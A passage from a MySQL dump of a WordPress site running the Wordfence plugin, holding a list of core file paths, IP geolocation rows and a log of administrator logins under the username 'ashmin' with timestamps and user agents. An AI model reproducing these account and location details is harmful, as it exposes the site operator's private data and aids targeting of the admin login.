23,'wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css'),(8624,'wp-includes/js/mediaelement/mediaelementplayer.css'),(8625,'wp-includes/js/mediaelement/mediaelementplayer.min.css'),(8626,'wp-includes/js/mediaelement/mejs-controls.png'),(8627,'wp-includes/js/mediaelement/mejs-controls.svg'),(8628,'wp-includes/js/mediaelement/renderers/vimeo.js'),(8629,'wp-includes/js/mediaelement/renderers/vimeo.min.js'),(8630,'wp-includes/js/mediaelement/wp-mediaelement.css'),(8631,'wp-includes/js/mediaelement/wp-mediaelement.js'),(8632,'wp-includes/js/mediaelement/wp-mediaelement.min.css'),(8633,'wp-includes/js/mediaelement/wp-mediaelement.min.js'),(8634,'wp-includes/js/mediaelement/wp-playlist.js'),(8635,'wp-includes/js/mediaelement/wp-playlist.min.js'),(8636,'wp-includes/js/plupload/handlers.js'),(8637,'wp-includes/js/plupload/handlers.min.js'),(8638,'wp-includes/js/plupload/license.txt'),(8639,'wp-includes/js/plupload/moxie.js'),(8640,'wp-includes/js/plupload/moxie.min.js'),(8641,'wp-includes/js/plupload/plupload.js'),(8642,'wp-includes/js/plupload/plupload.min.js'),(8643,'wp-includes/js/plupload/wp-plupload.js'),(8644,'wp-includes/js/plupload/wp-plupload.min.js'),(8645,'wp-includes/js/quicktags.js'),(8646,'wp-includes/js/quicktags.min.js'),(8647,'wp-includes/js/shortcode.js'),(8648,'wp-includes/js/shortcode.min.js'),(8649,'wp-includes/js/swfobject.js'),(8650,'wp-includes/js/swfupload/handlers.js'),(8651,'wp-includes/js/swfupload/handlers.min.js'),(8652,'wp-includes/js/swfupload/license.txt'),(8653,'wp-includes/js/swfupload/swfupload.js'),(8654,'wp-includes/js/thickbox/loadingAnimation.gif'),(8655,'wp-includes/js/thickbox/macFFBgHack.png'),(8656,'wp-includes/js/thickbox/thickbox.css'),(8657,'wp-includes/js/thickbox/thickbox.js'),(8658,'wp-includes/js/tinymce/langs/wp-langs-en.js'),(8659,'wp-includes/js/tinymce/license.txt'),(8660,'wp-includes/js/tinymce/plugins/charmap/plugin.js'),(8661,'wp-includes/js/tinymce/plugins/charmap/plugin.min.js'),(8662,'wp-includes/js/tinymce/plugins/colorpicker/plugin.js'),(8663,'wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js'),(8664,'wp-includes/js/tinymce/plugins/compat3x/css/dialog.css'),(8665,'wp-includes/js/tinymce/plugins/compat3x/plugin.js'),(8666,'wp-includes/js/tinymce/plugins/compat3x/plugin.min.js'),(8667,'wp-includes/js/tinymce/plugins/directionality/plugin.js'),(8668,'wp-includes/js/tinymce/plugins/directionality/plugin.min.js'),(8669,'wp-includes/js/tinymce/plugins/fullscreen/plugin.js'),(8670,'wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js'),(8671,'wp-includes/js/tinymce/plugins/hr/plugin.js'),(8672,'wp-includes/js/tinymce/plugins/hr/plugin.min.js'),(8673,'wp-includes/js/tinymce/plugins/image/plugin.js'),(8674,'wp-includes/js/tinymce/plugins/image/plugin.min.js'),(8675,'wp-includes/js/tinymce/plugins/link/plugin.js'),(8676,'wp-includes/js/tinymce/plugins/link/plugin.min.js'),(8677,'wp-includes/js/tinymce/plugins/lists/plugin.js'),(8678,'wp-includes/js/tinymce/plugins/lists/plugin.min.js'),(8679,'wp-includes/js/tinymce/plugins/media/plugin.js'),(8680,'wp-includes/js/tinymce/plugins/media/plugin.min.js'),(8681,'wp-includes/js/tinymce/plugins/paste/plugin.js'),(8682,'wp-includes/js/tinymce/plugins/paste/plugin.min.js'),(8683,'wp-includes/js/tinymce/plugins/tabfocus/plugin.js'),(8684,'wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js'),(8685,'wp-includes/js/tinymce/plugins/textcolor/plugin.js'),(8686,'wp-includes/js/tinymce/plugins/textcolor/plugin.min.js'),(8687,'wp-includes/js/tinymce/plugins/wordpress/plugin.js'),(8688,'wp-includes/js/tinymce/plugins/wordpress/plugin.min.js'),(8689,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.js'),(8690,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js'),(8691,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.js'),(8692,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js'),(8693,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.js'),(8694,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js'),(8695,'wp-includes/js/tinymce/plugins/wpemoji/plugin.js'),(8696,'wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js'),(8697,'wp-includes/js/tinymce/plugins/wpgallery/plugin.js'),(8698,'wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js'),(8699,'wp-includes/js/tinymce/plugins/wplink/plugin.js'),(8700,'wp-includes/js/tinymce/plugins/wplink/plugin.min.js'),(8701,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.js'),(8702,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js'),(8703,'wp-includes/js/tinymce/plugins/wpview/plugin.js'),(8704,'wp-includes/js/tinymce/plugins/wpview/plugin.min.js'),(8705,'wp-includes/js/tinymce/skins/lightgray/content.inline.min.css'),(8706,'wp-includes/js/tinymce/skins/lightgray/content.min.css'),(8707,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot'),(8708,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg'),(8709,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf'),(8710,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff'),(8711,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot'),(8712,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg'),(8713,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf'),(8714,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff'),(8715,'wp-includes/js/tinymce/skins/lightgray/img/anchor.gif'),(8716,'wp-includes/js/tinymce/skins/lightgray/img/loader.gif'),(8717,'wp-includes/js/tinymce/skins/lightgray/img/object.gif'),(8718,'wp-includes/js/tinymce/skins/lightgray/img/trans.gif'),(8719,'wp-includes/js/tinymce/skins/lightgray/skin.min.css'),(8720,'wp-includes/js/tinymce/skins/wordpress/images/audio.png'),(8721,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png'),(8722,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png'),(8723,'wp-includes/js/tinymce/skins/wordpress/images/embedded.png'),(8724,'wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png'),(8725,'wp-includes/js/tinymce/skins/wordpress/images/gallery.png'),(8726,'wp-includes/js/tinymce/skins/wordpress/images/more-2x.png'),(8727,'wp-includes/js/tinymce/skins/wordpress/images/more.png'),(8728,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png'),(8729,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png'),(8730,'wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png'),(8731,'wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png'),(8732,'wp-includes/js/tinymce/skins/wordpress/images/video.png'),(8733,'wp-includes/js/tinymce/skins/wordpress/wp-content.css'),(8734,'wp-includes/js/tinymce/themes/inlite/theme.js'),(8735,'wp-includes/js/tinymce/themes/inlite/theme.min.js'),(8736,'wp-includes/js/tinymce/themes/modern/theme.js'),(8737,'wp-includes/js/tinymce/themes/modern/theme.min.js'),(8738,'wp-includes/js/tinymce/tiny_mce_popup.js'),(8739,'wp-includes/js/tinymce/tinymce.min.js'),(8740,'wp-includes/js/tinymce/utils/editable_selects.js'),(8741,'wp-includes/js/tinymce/utils/form_utils.js'),(8742,'wp-includes/js/tinymce/utils/mctabs.js'),(8743,'wp-includes/js/tinymce/utils/validate.js'),(8744,'wp-includes/js/tinymce/wp-tinymce.js'),(8745,'wp-includes/js/tinymce/wp-tinymce.php'),(8746,'wp-includes/js/tw-sack.js'),(8747,'wp-includes/js/tw-sack.min.js'),(8748,'wp-includes/js/twemoji.js'),(8749,'wp-includes/js/twemoji.min.js'),(8750,'wp-includes/js/underscore.js'),(8751,'wp-includes/js/underscore.min.js'),(8752,'wp-includes/js/utils.js'),(8753,'wp-includes/js/utils.min.js'),(8754,'wp-includes/js/wp-ajax-response.js'),(8755,'wp-includes/js/wp-ajax-response.min.js'),(8756,'wp-includes/js/wp-api.js'),(8757,'wp-includes/js/wp-api.min.js'),(8758,'wp-includes/js/wp-auth-check.js'),(8759,'wp-includes/js/wp-auth-check.min.js'),(8760,'wp-includes/js/wp-backbone.js'),(8761,'wp-includes/js/wp-backbone.min.js'),(8762,'wp-includes/js/wp-custom-header.js'),(8763,'wp-includes/js/wp-custom-header.min.js'),(8764,'wp-includes/js/wp-embed-template.js'),(8765,'wp-includes/js/wp-embed-template.min.js'),(8766,'wp-includes/js/wp-embed.js'),(8767,'wp-includes/js/wp-embed.min.js'),(8768,'wp-includes/js/wp-emoji-loader.js'),(8769,'wp-includes/js/wp-emoji-loader.min.js'),(8770,'wp-includes/js/wp-emoji-release.min.js'),(8771,'wp-includes/js/wp-emoji.js'),(8772,'wp-includes/js/wp-emoji.min.js'),(8773,'wp-includes/js/wp-list-revisions.js'),(8774,'wp-includes/js/wp-list-revisions.min.js'),(8775,'wp-includes/js/wp-lists.js'),(8776,'wp-includes/js/wp-lists.min.js'),(8777,'wp-includes/js/wp-pointer.js'),(8778,'wp-includes/js/wp-pointer.min.js'),(8779,'wp-includes/js/wp-sanitize.js'),(8780,'wp-includes/js/wp-sanitize.min.js'),(8781,'wp-includes/js/wp-util.js'),(8782,'wp-includes/js/wp-util.min.js'),(8783,'wp-includes/js/wpdialog.js'),(8784,'wp-includes/js/wpdialog.min.js'),(8785,'wp-includes/js/wplink.js'),(8786,'wp-includes/js/wplink.min.js'),(8787,'wp-includes/js/zxcvbn-async.js'),(8788,'wp-includes/js/zxcvbn-async.min.js'),(8789,'wp-includes/js/zxcvbn.min.js'),(8790,'wp-includes/kses.php'),(8791,'wp-includes/l10n.php'),(8792,'wp-includes/link-template.php'),(8793,'wp-includes/load.php'),(8794,'wp-includes/locale.php'),(8795,'wp-includes/media-template.php'),(8796,'wp-includes/media.php'),(8797,'wp-includes/meta.php'),(8798,'wp-includes/ms-blogs.php'),(8799,'wp-includes/ms-default-constants.php'),(8800,'wp-includes/ms-default-filters.php'),(8801,'wp-includes/ms-deprecated.php'),(8802,'wp-includes/ms-files.php'),(8803,'wp-includes/ms-functions.php'),(8804,'wp-includes/ms-load.php'),(8805,'wp-includes/ms-network.php'),(8806,'wp-includes/ms-settings.php'),(8807,'wp-includes/ms-site.php'),(8808,'wp-includes/nav-menu-template.php'),(8809,'wp-includes/nav-menu.php'),(8810,'wp-includes/option.php'),(8811,'wp-includes/pluggable-deprecated.php'),(8812,'wp-includes/pluggable.php'),(8813,'wp-includes/plugin.php'),(8814,'wp-includes/pomo/entry.php'),(8815,'wp-includes/pomo/mo.php'),(8816,'wp-includes/pomo/plural-forms.php'),(8817,'wp-includes/pomo/po.php'),(8818,'wp-includes/pomo/streams.php'),(8819,'wp-includes/pomo/translations.php'),(8820,'wp-includes/post-formats.php'),(8821,'wp-includes/post-template.php'),(8822,'wp-includes/post-thumbnail-template.php'),(8823,'wp-includes/post.php'),(8824,'wp-includes/query.php'),(8825,'wp-includes/random_compat/byte_safe_strings.php'),(8826,'wp-includes/random_compat/cast_to_int.php'),(8827,'wp-includes/random_compat/error_polyfill.php'),(8828,'wp-includes/random_compat/random.php'),(8829,'wp-includes/random_compat/random_bytes_com_dotnet.php'),(8830,'wp-includes/random_compat/random_bytes_dev_urandom.php'),(8831,'wp-includes/random_compat/random_bytes_libsodium.php'),(8832,'wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(8833,'wp-includes/random_compat/random_bytes_mcrypt.php'),(8834,'wp-includes/random_compat/random_int.php'),(8835,'wp-includes/registration-functions.php'),(8836,'wp-includes/registration.php'),(8837,'wp-includes/rest-api/class-wp-rest-request.php'),(8838,'wp-includes/rest-api/class-wp-rest-response.php'),(8839,'wp-includes/rest-api/class-wp-rest-server.php'),(8840,'wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(8841,'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(8842,'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(8843,'wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(8844,'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(8845,'wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(8846,'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(8847,'wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(8848,'wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(8849,'wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(8850,'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(8851,'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(8852,'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(8853,'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(8854,'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(8855,'wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(8856,'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(8857,'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(8858,'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(8859,'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(8860,'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(8861,'wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),(8862,'wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(8863,'wp-includes/rest-api.php'),(8864,'wp-includes/revision.php'),(8865,'wp-includes/rewrite.php'),(8866,'wp-includes/rss-functions.php'),(8867,'wp-includes/rss.php'),(8868,'wp-includes/script-loader.php'),(8869,'wp-includes/session.php'),(8870,'wp-includes/shortcodes.php'),(8871,'wp-includes/sodium_compat/LICENSE'),(8872,'wp-includes/sodium_compat/autoload.php'),(8873,'wp-includes/sodium_compat/composer.json'),(8874,'wp-includes/sodium_compat/lib/constants.php'),(8875,'wp-includes/sodium_compat/lib/namespaced.php'),(8876,'wp-includes/sodium_compat/lib/php72compat.php'),(8877,'wp-includes/sodium_compat/lib/php72compat_const.php'),(8878,'wp-includes/sodium_compat/lib/sodium_compat.php'),(8879,'wp-includes/sodium_compat/namespaced/Compat.php'),(8880,'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(8881,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(8882,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(8883,'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(8884,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(8885,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(8886,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(8887,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(8888,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(8889,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(8890,'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(8891,'wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(8892,'wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(8893,'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(8894,'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(8895,'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(8896,'wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(8897,'wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(8898,'wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(8899,'wp-includes/sodium_compat/namespaced/Core/Util.php'),(8900,'wp-includes/sodium_compat/namespaced/Core/X25519.php'),(8901,'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(8902,'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(8903,'wp-includes/sodium_compat/namespaced/Crypto.php'),(8904,'wp-includes/sodium_compat/namespaced/File.php'),(8905,'wp-includes/sodium_compat/src/Compat.php'),(8906,'wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(8907,'wp-includes/sodium_compat/src/Core/Base64/Common.php'),(8908,'wp-includes/sodium_compat/src/Core/Base64/Original.php'),(8909,'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(8910,'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(8911,'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(8912,'wp-includes/sodium_compat/src/Core/ChaCha20.php'),(8913,'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(8914,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(8915,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(8916,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(8917,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(8918,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(8919,'wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(8920,'wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(8921,'wp-includes/sodium_compat/src/Core/Curve25519.php'),(8922,'wp-includes/sodium_compat/src/Core/Ed25519.php'),(8923,'wp-includes/sodium_compat/src/Core/HChaCha20.php'),(8924,'wp-includes/sodium_compat/src/Core/HSalsa20.php'),(8925,'wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(8926,'wp-includes/sodium_compat/src/Core/Poly1305.php'),(8927,'wp-includes/sodium_compat/src/Core/Salsa20.php'),(8928,'wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(8929,'wp-includes/sodium_compat/src/Core/SipHash.php'),(8930,'wp-includes/sodium_compat/src/Core/Util.php'),(8931,'wp-includes/sodium_compat/src/Core/X25519.php'),(8932,'wp-includes/sodium_compat/src/Core/XChaCha20.php'),(8933,'wp-includes/sodium_compat/src/Core/XSalsa20.php'),(8934,'wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(8935,'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(8936,'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(8937,'wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(8938,'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(8939,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(8940,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(8941,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(8942,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(8943,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(8944,'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(8945,'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(8946,'wp-includes/sodium_compat/src/Core32/Curve25519.php'),(8947,'wp-includes/sodium_compat/src/Core32/Ed25519.php'),(8948,'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(8949,'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(8950,'wp-includes/sodium_compat/src/Core32/Int32.php'),(8951,'wp-includes/sodium_compat/src/Core32/Int64.php'),(8952,'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(8953,'wp-includes/sodium_compat/src/Core32/Poly1305.php'),(8954,'wp-includes/sodium_compat/src/Core32/Salsa20.php'),(8955,'wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(8956,'wp-includes/sodium_compat/src/Core32/SipHash.php'),(8957,'wp-includes/sodium_compat/src/Core32/Util.php'),(8958,'wp-includes/sodium_compat/src/Core32/X25519.php'),(8959,'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(8960,'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(8961,'wp-includes/sodium_compat/src/Crypto.php'),(8962,'wp-includes/sodium_compat/src/Crypto32.php'),(8963,'wp-includes/sodium_compat/src/File.php'),(8964,'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(8965,'wp-includes/sodium_compat/src/SodiumException.php'),(8966,'wp-includes/spl-autoload-compat.php'),(8967,'wp-includes/taxonomy.php'),(8968,'wp-includes/template-loader.php'),(8969,'wp-includes/template.php'),(8970,'wp-includes/theme-compat/comments.php'),(8971,'wp-includes/theme-compat/embed-404.php'),(8972,'wp-includes/theme-compat/embed-content.php'),(8973,'wp-includes/theme-compat/embed.php'),(8974,'wp-includes/theme-compat/footer-embed.php'),(8975,'wp-includes/theme-compat/footer.php'),(8976,'wp-includes/theme-compat/header-embed.php'),(8977,'wp-includes/theme-compat/header.php'),(8978,'wp-includes/theme-compat/sidebar.php'),(8979,'wp-includes/theme.php'),(8980,'wp-includes/update.php'),(8981,'wp-includes/user.php'),(8982,'wp-includes/vars.php'),(8983,'wp-includes/version.php'),(8984,'wp-includes/widgets/class-wp-nav-menu-widget.php'),(8985,'wp-includes/widgets/class-wp-widget-archives.php'),(8986,'wp-includes/widgets/class-wp-widget-calendar.php'),(8987,'wp-includes/widgets/class-wp-widget-categories.php'),(8988,'wp-includes/widgets/class-wp-widget-custom-html.php'),(8989,'wp-includes/widgets/class-wp-widget-links.php'),(8990,'wp-includes/widgets/class-wp-widget-media-audio.php'),(8991,'wp-includes/widgets/class-wp-widget-media-gallery.php'),(8992,'wp-includes/widgets/class-wp-widget-media-image.php'),(8993,'wp-includes/widgets/class-wp-widget-media-video.php'),(8994,'wp-includes/widgets/class-wp-widget-media.php'),(8995,'wp-includes/widgets/class-wp-widget-meta.php'),(8996,'wp-includes/widgets/class-wp-widget-pages.php'),(8997,'wp-includes/widgets/class-wp-widget-recent-comments.php'),(8998,'wp-includes/widgets/class-wp-widget-recent-posts.php'),(8999,'wp-includes/widgets/class-wp-widget-rss.php'),(9000,'wp-includes/widgets/class-wp-widget-search.php'),(9001,'wp-includes/widgets/class-wp-widget-tag-cloud.php'),(9002,'wp-includes/widgets/class-wp-widget-text.php'),(9003,'wp-includes/widgets.php'),(9004,'wp-includes/wlwmanifest.xml'),(9005,'wp-includes/wp-db.php'),(9006,'wp-includes/wp-diff.php'),(9007,'wp-links-opml.php'),(9008,'wp-load.php'),(9009,'wp-login.php'),(9010,'wp-mail.php'),(9011,'wp-settings.php'),(9012,'wp-signup.php'),(9013,'wp-trackback.php'),(9014,'xmlrpc.php');
/*!40000 ALTER TABLE `ar_wfKnownFileList` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfLiveTrafficHuman`
--

DROP TABLE IF EXISTS `ar_wfLiveTrafficHuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfLiveTrafficHuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfLiveTrafficHuman`
--

LOCK TABLES `ar_wfLiveTrafficHuman` WRITE;
/*!40000 ALTER TABLE `ar_wfLiveTrafficHuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_wfLiveTrafficHuman` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfLocs`
--

DROP TABLE IF EXISTS `ar_wfLocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfLocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfLocs`
--

LOCK TABLES `ar_wfLocs` WRITE;
/*!40000 ALTER TABLE `ar_wfLocs` DISABLE KEYS */;
INSERT INTO `ar_wfLocs` VALUES ('\0\0\0\0\0\0\0\0\0\0E',1598357864,0,'Ashby','Minnesota','United States','US',46.0780983,-95.8214035),('\0\0\0\0\0\0\0\0\0\0/ˉ',1604081840,0,'Seminole','Florida','United States','US',27.8484993,-82.7944031);
/*!40000 ALTER TABLE `ar_wfLocs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfLogins`
--

DROP TABLE IF EXISTS `ar_wfLogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfLogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=MyISAM AUTO_INCREMENT=122 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfLogins`
--

LOCK TABLES `ar_wfLogins` WRITE;
/*!40000 ALTER TABLE `ar_wfLogins` DISABLE KEYS */;
INSERT INTO `ar_wfLogins` VALUES (1,135,1522549246.133168,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0'),(2,142,1522549463.107317,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0'),(3,162,1522551598.209472,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0'),(4,174,1522555463.757001,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0'),(5,581,1522636380.526093,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0'),(6,732,1522676140.526601,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0l','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0'),(7,776,1522689321.383936,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0l','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0'),(8,6706,1523926239.529019,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0'),(9,6730,1523928292.524604,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0'),(10,8907,1524613240.559580,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0'),(11,58060,1534194578.129755,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0lM','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:61.0) Gecko/20100101 Firefox/61.0'),(12,86982,1541733616.908299,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:63.0) Gecko/20100101 Firefox/63.0'),(13,91613,1542327475.602366,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:63.0) Gecko/20100101 Firefox/63.0'),(14,97140,1543283407.235009,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:63.0) Gecko/20100101 